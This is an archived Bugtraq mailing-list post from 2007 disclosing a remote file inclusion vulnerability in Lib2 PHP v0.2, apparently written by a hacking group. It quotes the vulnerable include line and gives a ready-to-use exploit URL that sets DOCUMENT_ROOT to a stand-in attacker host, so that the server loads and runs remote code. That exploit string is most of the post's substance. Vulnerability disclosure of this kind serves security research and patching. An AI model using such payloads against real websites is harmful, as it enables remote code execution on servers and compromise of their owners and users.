Bugtraq mailing list archives
Lib2 PHP v0.2 (DOCUMENT_ROOT) Remote File Inclusion Vulnerability
From: ilkerkandemir () mynet com
Date: 11 Aug 2007 15:05:16 -0000
------------------------------------------------------------------------------------------------------------------- MefistoLabs.Com PreSents... Script: Lib2 PHP v0.2 Script Download1: http://www.omnistarinc.com/~fonin/projects/lib2/lib2-0.2.tar.gz Script Download2: http://freshmeat.net/projects/lib2/ Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> Code: include "$DOCUMENT_ROOT/../lib/config.php"; ------------------------------------------------------------------------------------------------------------------- Exploit: [lib2_path]/adm/my_statistics.php?DOCUMENT_ROOT=http://attacker.txt? ------------------------------------------------------------------------------------------------------------------- Tnx: Ajann,Dumenci,H0tturk,Str0ke # MefistoLabs.Com
Current thread:
- Lib2 PHP v0.2 (DOCUMENT_ROOT) Remote File Inclusion Vulnerability ilkerkandemir (Aug 13)